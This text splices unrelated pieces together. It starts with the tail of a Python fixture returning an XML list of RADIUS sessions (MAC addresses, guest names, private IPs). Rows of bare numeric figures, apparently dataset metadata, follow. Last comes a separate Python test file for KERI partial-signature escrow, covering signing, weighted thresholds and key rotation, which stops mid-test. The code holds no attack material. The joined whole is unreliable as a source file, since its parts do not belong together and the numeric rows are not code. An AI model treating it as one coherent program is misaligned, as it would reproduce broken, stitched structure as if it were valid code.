ress><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:F6:2E:9A</user_name><calling_station_id>00:00:AA:F6:2E:9A</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000031</acct_session_id><server>web</server><framed_ip_address>10.0.1.43</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:DD:DD:5C</user_name><calling_station_id>00:11:BB:DD:DD:5C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000023</acct_session_id><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:1A:5F:68</user_name><calling_station_id>00:11:BB:1A:5F:68</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000110</acct_session_id><server>web</server><framed_ip_address>10.0.1.16</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:D3:22:6D</user_name><calling_station_id>00:11:BB:D3:22:6D</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000000E</acct_session_id><server>web</server><framed_ip_address>10.0.1.19</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:1A:DB:DE</user_name><calling_station_id>00:11:BB:1A:DB:DE</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000025</acct_session_id><server>web</server><framed_ip_address>10.0.1.111</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:94:43:3B</user_name><calling_station_id>00:00:AA:94:43:3B</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000003B</acct_session_id><server>web</server><framed_ip_address>10.0.1.61</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:2D:81:D7</user_name><calling_station_id>00:11:BB:2D:81:D7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000062</acct_session_id><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:62:49:FC</user_name><calling_station_id>00:11:BB:62:49:FC</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000C5</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:14:6A:B5</user_name><calling_station_id>00:00:AA:14:6A:B5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000052</acct_session_id><server>web</server><framed_ip_address>10.0.1.5</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:98:31:A5</user_name><calling_station_id>00:11:BB:98:31:A5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000005A</acct_session_id><server>web</server><framed_ip_address>10.0.1.96</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:D8:FC:9C</user_name><calling_station_id>00:11:BB:D8:FC:9C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000020</acct_session_id><server>web</server><framed_ip_address>10.0.1.19</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:A9:AC:74</user_name><calling_station_id>00:11:BB:A9:AC:74</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000034</acct_session_id><server>web</server><framed_ip_address>10.0.1.9</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:5C:68:50</user_name><calling_station_id>00:11:BB:5C:68:50</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000004C</acct_session_id><server>web</server><framed_ip_address>10.0.1.13</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:C6:7A:16</user_name><calling_station_id>00:11:BB:C6:7A:16</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000033</acct_session_id><server>web</server><framed_ip_address>10.0.1.86</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:7A:BD:9D</user_name><calling_station_id>00:11:BB:7A:BD:9D</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000077</acct_session_id><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:6D:5D:5C</user_name><calling_station_id>00:11:BB:6D:5D:5C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000004D</acct_session_id><server>web</server><framed_ip_address>10.0.1.9</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:83:2C:52</user_name><calling_station_id>00:11:BB:83:2C:52</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000042</acct_session_id><server>web</server><framed_ip_address>10.0.1.55</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:E1:99:4A</user_name><calling_station_id>00:11:BB:E1:99:4A</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000014</acct_session_id><server>web</server><framed_ip_address>10.0.1.24</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:96:67:A2</user_name><calling_station_id>00:11:BB:96:67:A2</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000105</acct_session_id><server>web</server><framed_ip_address>10.0.1.31</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:4B:68:3D</user_name><calling_station_id>00:00:AA:4B:68:3D</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000A1</acct_session_id><server>web</server><framed_ip_address>10.0.1.17</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:A3:54:0B</user_name><calling_station_id>00:11:BB:A3:54:0B</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000006D</acct_session_id><server>web</server><framed_ip_address>10.0.1.9</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:03:82:84</user_name><calling_station_id>00:11:BB:03:82:84</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000D2</acct_session_id><server>web</server><framed_ip_address>10.0.1.21</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:1D:E1:79</user_name><calling_station_id>00:11:BB:1D:E1:79</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000061</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:C1:41:46</user_name><calling_station_id>00:11:BB:C1:41:46</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000F3</acct_session_id><server>web</server><framed_ip_address>10.0.1.17</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:9E:22:FC</user_name><calling_station_id>00:11:BB:9E:22:FC</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000070</acct_session_id><server>web</server><framed_ip_address>10.0.1.11</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>48:03:62:00:00:00</user_name><calling_station_id>48:03:62:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000051</acct_session_id><server>web</server><framed_ip_address>10.0.1.21</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:89:41:52</user_name><calling_station_id>00:11:BB:89:41:52</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000006B</acct_session_id><server>web</server><framed_ip_address>10.0.1.7</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:94:91:BF</user_name><calling_station_id>00:00:AA:94:91:BF</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000124</acct_session_id><server>web</server><framed_ip_address>10.0.1.24</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:20:7C:39</user_name><calling_station_id>00:11:BB:20:7C:39</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000008E</acct_session_id><server>web</server><framed_ip_address>10.0.1.15</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:FA:21:E5</user_name><calling_station_id>00:00:AA:FA:21:E5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000045</acct_session_id><server>web</server><framed_ip_address>10.0.1.14</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:C8:94:F7</user_name><calling_station_id>00:11:BB:C8:94:F7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000007F</acct_session_id><server>web</server><framed_ip_address>10.0.1.92</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:D3:85:FD</user_name><calling_station_id>00:11:BB:D3:85:FD</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000009</acct_session_id><server>web</server><framed_ip_address>10.0.1.28</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:61:7E:E4</user_name><calling_station_id>00:11:BB:61:7E:E4</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000071</acct_session_id><server>web</server><framed_ip_address>10.0.1.16</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:F1:FF:10</user_name><calling_station_id>00:11:BB:F1:FF:10</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000BB</acct_session_id><server>web</server><framed_ip_address>10.0.1.81</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:7F:F3:B0</user_name><calling_station_id>00:11:BB:7F:F3:B0</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000002B</acct_session_id><server>web</server><framed_ip_address>10.0.1.58</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:7C:A7:D9</user_name><calling_station_id>00:11:BB:7C:A7:D9</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000126</acct_session_id><server>web</server><framed_ip_address>10.0.1.77</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>A4:A4:D3:00:00:00</user_name><calling_station_id>A4:A4:D3:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000066</acct_session_id><server>web</server><framed_ip_address>10.0.1.23</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:75:CC:82</user_name><calling_station_id>00:11:BB:75:CC:82</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000040</acct_session_id><server>web</server><framed_ip_address>10.0.1.11</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:84:2C:E3</user_name><calling_station_id>00:11:BB:84:2C:E3</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000037</acct_session_id><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:31:DD:94</user_name><calling_station_id>00:11:BB:31:DD:94</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000021</acct_session_id><server>web</server><framed_ip_address>10.0.1.20</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>10:1B:54:00:00:00</user_name><calling_station_id>10:1B:54:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000006C</acct_session_id><server>web</server><framed_ip_address>10.0.1.17</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>1C:98:EC:00:00:00</user_name><calling_station_id>1C:98:EC:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000053</acct_session_id><server>web</server><framed_ip_address>10.0.1.12</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:FE:74:46</user_name><calling_station_id>00:11:BB:FE:74:46</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000CB</acct_session_id><server>web</server><framed_ip_address>10.0.1.130</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:FB:32:BA</user_name><calling_station_id>00:11:BB:FB:32:BA</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000003E</acct_session_id><server>web</server><framed_ip_address>10.0.1.42</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:EE:0A:C0</user_name><calling_station_id>00:11:BB:EE:0A:C0</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000C3</acct_session_id><server>web</server><framed_ip_address>10.0.1.57</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:20:F2:86</user_name><calling_station_id>00:11:BB:20:F2:86</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000017</acct_session_id><server>web</server><framed_ip_address>10.0.1.52</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>F0:5F:5A:00:00:00</user_name><calling_station_id>F0:5F:5A:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000004B</acct_session_id><server>web</server><framed_ip_address>10.0.1.11</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:21:15:00:00:00</user_name><calling_station_id>00:21:15:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000003F</acct_session_id><server>web</server><framed_ip_address>10.0.1.90</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>78:EC:74:00:00:00</user_name><calling_station_id>78:EC:74:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000003</acct_session_id><server>web</server><framed_ip_address>10.0.1.45</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>DC:E2:AC:00:00:00</user_name><calling_station_id>DC:E2:AC:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000047</acct_session_id><server>web</server><framed_ip_address>10.0.1.69</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>70:CD:60:00:00:00</user_name><calling_station_id>70:CD:60:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000048</acct_session_id><server>web</server><framed_ip_address>10.0.1.68</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:1A:C5:00:00:00</user_name><calling_station_id>00:1A:C5:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000001B</acct_session_id><server>web</server><framed_ip_address>10.0.1.43</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:D0:D2:00:00:00</user_name><calling_station_id>00:D0:D2:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000001A</acct_session_id><server>web</server><framed_ip_address>10.0.1.100</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:17:59:00:00:00</user_name><calling_station_id>00:17:59:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000046</acct_session_id><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest3756</user_name><calling_station_id>E5:40:0F:B5:13:03</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000063</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:13:96:00:00:00</user_name><calling_station_id>00:13:96:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000059</acct_session_id><server>web</server><framed_ip_address>10.0.1.95</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest6378</user_name><calling_station_id>DD:23:19:09:2B:E9</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000075</acct_session_id><server>web</server><framed_ip_address>10.0.1.46</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest8989</user_name><calling_station_id>F3:55:96:25:64:29</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000068</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest4623</user_name><calling_station_id>E5:70:0A:12:2B:B7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000041</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest9247</user_name><calling_station_id>C2:13:1A:88:DD:90</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000030</acct_session_id><server>web</server><framed_ip_address>10.0.1.39</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest3337</user_name><calling_station_id>DF:10:8B:F6:F0:B1</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000011</acct_session_id><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest9255</user_name><calling_station_id>92:EC:CB:3F:C9:E9</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000028</acct_session_id><server>web</server><framed_ip_address>10.0.1.8</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest8989</user_name><calling_station_id>63:C6:05:25:A4:55</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000022</acct_session_id><server>web</server><framed_ip_address>10.0.1.12</framed_ip_address><framed_ipv6_address/></activeSession></activeList>
"""
def sample_authlist():
return xmlstr
| 8,963.75
| 71,662
| 0.821977
| 13,279
| 71,710
| 4.098426
| 0.034415
| 0.162064
| 0.144057
| 0.099039
| 0.972126
| 0.970362
| 0.929772
| 0.929037
| 0.862889
| 0.79946
| 0
| 0.131033
| 0.000251
| 71,710
| 7
| 71,663
| 10,244.285714
| 0.62809
| 0
| 1
| 0
| 0
| 0.25
| 0.999205
| 0.998661
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 15
|
c51b4b64025985b29616205dfa344fe1e16200a2
| 61,938
|
py
|
Python
|
tests/core/test_escrow.py
|
KodexData/keripy
|
2a6b7883fcb04c29b4ce8f55ebb5d2eb36e24689
|
[
"Apache-2.0"
] | 26
|
2020-05-18T19:52:33.000Z
|
2022-03-02T13:58:45.000Z
|
tests/core/test_escrow.py
|
KodexData/keripy
|
2a6b7883fcb04c29b4ce8f55ebb5d2eb36e24689
|
[
"Apache-2.0"
] | 16
|
2020-08-26T12:53:37.000Z
|
2021-05-26T15:29:19.000Z
|
tests/core/test_escrow.py
|
m00sey/keripy
|
7bdaf57972d44c2435726bd2300b01a1a90a83b2
|
[
"Apache-2.0"
] | 13
|
2020-05-05T20:21:26.000Z
|
2022-03-31T14:11:30.000Z
|
# -*- encoding: utf-8 -*-
"""
tests escrows in database primarily logic in Kevery and Kever from keri.core.eventing
"""
import os
import time
import datetime
import pytest
from keri import help
from keri.help import helping
from keri.db import dbing, basing
from keri.app import keeping
from keri.core import coring, eventing, parsing
logger = help.ogler.getLogger()
def test_partial_signed_escrow():
"""
Test partially signed escrow
"""
salt = coring.Salter(raw=b'0123456789abcdef').qb64 # init wes Salter
psr = parsing.Parser()
# init event DB and keep DB
with basing.openDB(name="edy") as db, keeping.openKS(name="edy") as ks:
# Init key pair manager
mgr = keeping.Manager(keeper=ks, salt=salt)
# Init Kevery with event DB
kvy = eventing.Kevery(db=db)
# create inception event with 3 keys each in incept and next sets
# defaults are algo salty and rooted
sith = ["1/2", "1/2", "1/2"] # 2 of 3 but with weighted threshold
nxtsith = ["1/2", "1/2", "1/2"]
verfers, digers, cst, nst = mgr.incept(icount=3, isith=sith,
ncount=3, nsith=nxtsith,
stem='wes', temp=True)
assert cst == nst == sith
srdr = eventing.incept(keys=[verfer.qb64 for verfer in verfers],
sith=sith,
nxt=coring.Nexter(sith=nxtsith,
digs=[diger.qb64 for diger in digers]).qb64,
code=coring.MtrDex.Blake3_256)
pre = srdr.ked["i"]
mgr.move(old=verfers[0].qb64, new=pre) # move key pair label to prefix
sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
msg.extend(counter.qb64b)
msg.extend(sigers[0].qb64b)
# apply msg to Kevery to process
psr.parse(ims=bytearray(msg), kvy=kvy)
# kvy.process(ims=bytearray(msg)) # process local copy of msg
assert pre not in kvy.kevers # event not accepted
escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
assert len(escrows) == 1
assert escrows[0] == srdr.digb # escrow entry for event
# verify Kevery process is idempotent to previously escrowed events
psr.parse(ims=bytearray(msg), kvy=kvy)
# kvy.process(ims=bytearray(msg)) # process local copy of msg
assert pre not in kvy.kevers # event not accepted
escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
assert len(escrows) == 1
assert escrows[0] == srdr.digb # escrow entry for event
# verify Kevery process partials escrow is idempotent to previously escrowed events
# assuming not stale but nothing else has changed
kvy.processEscrowPartialSigs()
assert pre not in kvy.kevers # event not accepted
escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
assert len(escrows) == 1
assert escrows[0] == srdr.digb # escrow entry for event
# Send message again but with signature from other siger
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
msg.extend(counter.qb64b)
msg.extend(sigers[2].qb64b)
# apply msg to Kevery to process
psr.parse(ims=bytearray(msg), kvy=kvy)
# kvy.process(ims=bytearray(msg)) # process local copy of msg
assert pre not in kvy.kevers # event not accepted
escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
assert len(escrows) == 1
assert escrows[0] == srdr.digb # escrow entry for event
sigs = kvy.db.getSigs(dbing.dgKey(pre, srdr.dig)) # but sigs is more
assert len(sigs) == 2
# get DTS set by escrow date time stamp on event
edtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))
# verify Kevery process partials escrow now unescrows correctly given
# two signatures and assuming not stale
kvy.processEscrowPartialSigs()
assert pre in kvy.kevers # event now accepted via escrow
kvr = kvy.kevers[pre] # kever created so event was validated
assert kvr.prefixer.qb64 == pre
assert kvr.serder.dig == srdr.dig # key state updated so event was validated
# escrows now empty
escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
assert len(escrows) == 0
# get DTS set by first seen event acceptance date time stamp
adtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))
# ensure accept time is later than escrow time, default timedelta is zero
assert (helping.fromIso8601(adtsb) - helping.fromIso8601(edtsb)) > datetime.timedelta()
# send duplicate message with all three sigs
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
psr.parse(ims=bytearray(msg), kvy=kvy)
# kvy.process(ims=bytearray(msg)) # process local copy of msg
sigs = kvy.db.getSigs(dbing.dgKey(pre, srdr.dig))
assert len(sigs) == 3
escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
assert len(escrows) == 0 # escrow stays gone
# get DTS after partial last sig should not change dts from first accepted
pdtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))
assert pdtsb == adtsb
# get first seen
fsdig = kvy.db.getFe(dbing.fnKey(pre, 0))
assert fsdig == srdr.digb
# create interaction event for
srdr = eventing.interact(pre=kvr.prefixer.qb64,
dig=kvr.serder.diger.qb64,
sn=kvr.sn+1,
data=[])
sigers = mgr.sign(ser=srdr.raw, verfers=kvr.verfers)
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
msg.extend(counter.qb64b)
msg.extend(sigers[1].qb64b)
# apply msg to Kevery to process
psr.parse(ims=bytearray(msg), kvy=kvy)
# kvy.process(ims=bytearray(msg)) # process local copy of msg
assert kvr.sn == 0 # key state not updated
escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
assert len(escrows) == 1
assert escrows[0] == srdr.digb # escrow entry for event
# add another sig
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
msg.extend(counter.qb64b)
msg.extend(sigers[0].qb64b)
# apply msg to Kevery to process
psr.parse(ims=bytearray(msg), kvy=kvy)
# kvy.process(ims=bytearray(msg)) # process local copy of msg
assert kvr.sn == 0 # key state not updated
escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
assert len(escrows) == 1
assert escrows[0] == srdr.digb # escrow entry for event
sigs = kvy.db.getSigs(dbing.dgKey(pre, srdr.dig)) # but sigs is more
assert len(sigs) == 2
# Process partials but stale escrow despite two sigs set Timeout to 0
kvy.TimeoutPSE = 0 # forces all escrows to be stale
time.sleep(0.001)
kvy.processEscrowPartialSigs()
assert kvr.sn == 0 # key state not updated
# escrows now empty
escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
assert len(escrows) == 0
# Now reset timeout so not zero
kvy.TimeoutPSE = 3600
# resend events to load escrow
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
msg.extend(counter.qb64b)
msg.extend(sigers[1].qb64b)
# apply msg to Kevery to process
psr.parse(ims=bytearray(msg), kvy=kvy)
# kvy.process(ims=bytearray(msg)) # process local copy of msg
assert kvr.sn == 0 # key state not updated
escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
assert len(escrows) == 1
assert escrows[0] == srdr.digb # escrow entry for event
# add another sig
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
msg.extend(counter.qb64b)
msg.extend(sigers[0].qb64b)
# apply msg to Kevery to process
psr.parse(ims=bytearray(msg), kvy=kvy)
# kvy.process(ims=bytearray(msg)) # process local copy of msg
assert kvr.sn == 0 # key state not updated
escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
assert len(escrows) == 1
assert escrows[0] == srdr.digb # escrow entry for event
# get DTS set by escrow date time stamp on event
edtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))
# Process partials but now escrow not stale
kvy.processEscrowPartialSigs()
assert kvr.serder.dig == srdr.dig # key state updated so event was validated
assert kvr.sn == 1 # key state successfully updated
escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
assert len(escrows) == 0 # escrow gone
# get DTS set by first seen event acceptance date time stamp
adtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))
# ensure accept time is later than escrow time, default timedelta is zero
assert (helping.fromIso8601(adtsb) - helping.fromIso8601(edtsb)) > datetime.timedelta()
# send duplicate message but add last sig
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
msg.extend(counter.qb64b)
msg.extend(sigers[2].qb64b)
psr.parse(ims=bytearray(msg), kvy=kvy)
# kvy.process(ims=bytearray(msg)) # process local copy of msg
sigs = kvy.db.getSigs(dbing.dgKey(pre, srdr.dig)) # but sigs is more
assert len(sigs) == 3
escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
assert len(escrows) == 0 # escrow stays gone
# get DTS after partial last sig should not change dts from first accepted
pdtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))
assert pdtsb == adtsb
# get first seen
fsdig = kvy.db.getFe(dbing.fnKey(pre, 1))
assert fsdig == srdr.digb
# Create rotation event
# get current keys as verfers and next digests as digers
sith = nxtsith # rotate so nxtsith is now current sith and need new nextsith
# 2 of first 3 and 1 of last 2
nxtsith = [["1/2", "1/2", "1/2"],["1/1", "1/1"]]
verfers, digers, cst, nst = mgr.rotate(pre=pre, count=5, sith=nxtsith, temp=True)
assert nst == nxtsith
srdr = eventing.rotate(pre=kvr.prefixer.qb64,
keys=[verfer.qb64 for verfer in verfers],
sith=sith,
dig=kvr.serder.diger.qb64,
nxt=coring.Nexter(sith=nxtsith,
digs=[diger.qb64 for diger in digers]).qb64,
sn=kvr.sn+1,
data=[])
sigers = mgr.sign(ser=srdr.raw, verfers=verfers)
msg = bytearray(srdr.raw)
counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
count=len(sigers))
msg.extend(counter.qb64b)
for siger in sigers:
msg.extend(siger.qb64b)
# apply msg to Kevery
psr.parse(ims=bytearray(msg), kvy=kvy)
# kvy.process(ims=bytearray(msg)) # process local copy of msg
assert kvr.serder.dig == srdr.dig # key state updated so event was validated
# Create rotation event
# get current keys as verfers and next digests as digers
sith = nxtsith # rotate so nxtsith is now current sith and need new nextsith
# 2 of first 3 and 1 of last 2
nxtsith = [["1/2", "1/2", "1/2"],["1/1", "1/1"]]
